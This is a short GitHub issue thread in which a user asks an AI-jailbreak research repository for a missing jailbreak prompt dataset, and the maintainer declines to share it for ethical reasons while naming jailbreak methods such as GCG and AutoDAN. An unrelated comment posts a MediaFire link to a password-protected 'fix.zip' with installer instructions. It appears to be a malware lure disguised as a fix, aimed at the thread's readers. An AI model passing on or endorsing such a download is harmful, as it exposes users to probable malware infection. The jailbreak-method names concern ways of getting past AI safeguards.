### ISSUE TITLE
about jailbreak_prompt.csv

### ISSUE THREAD

**Issue by payphone131** [ydyjya/LLM-IHS-Explanation#2]
hello, i want to reproduce some results about three-way classification but i couldn't find jailbreak_prompt.csv in ./exp_data. could you please provide this file?

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ydyjya** [comment]
Hi, you can reproduce some jailbreak paper to get jailbreak_prompt.csv, such as gcg, autodan and others. 
For ethical considerations, I can't spread the jailbreak prompt.
If you want to get the dataset, contact me using an official research institution or education email address, please.
